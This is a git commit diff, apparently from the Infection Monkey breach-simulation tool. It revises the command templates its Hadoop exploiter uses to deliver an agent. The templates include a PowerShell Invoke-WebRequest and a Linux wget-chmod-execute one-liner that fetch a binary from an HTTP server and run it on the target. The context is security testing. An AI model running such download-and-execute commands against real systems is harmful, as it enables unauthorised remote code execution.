Agent: Prevent overwriting hadoop linux agent

Because hadoop is re-requesting agents, we don't get the
agent if it already there, if it has size 0 and if it exists
we remove it.
This commit is contained in:
Ilija Lazoroski 2022-03-07 13:54:06 +01:00
parent 00829ac094
commit c802f21756
1 changed files with 6 additions and 3 deletions

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@ -46,16 +46,19 @@ CHECK_COMMAND = "echo %s" % ID_STRING
# Architecture checking commands
GET_ARCH_WINDOWS = "wmic os get osarchitecture" # can't remove, powershell exploiter uses
# All in one commands (upload, change permissions, run)
"powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { "
"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; "
" if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) "
'{& %(monkey_path)s %(monkey_type)s %(parameters)s } "'
# The hadoop server may request another monkey executable
# which results with a zero-size file which needs to be removed,
# this can lead to a race condition when the command is run twice
# so we are adding a 5 seconds sleep to prevent that
"! [ -f %(monkey_path)s ] "
"&& wget -O %(monkey_path)s %(http_path)s "
"wget --no-clobber -O %(monkey_path)s %(http_path)s "
"|| sleep 5 && ( ( ! [ -s %(monkey_path)s ] ) && rm %(monkey_path)s ) "
"; chmod +x %(monkey_path)s "
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"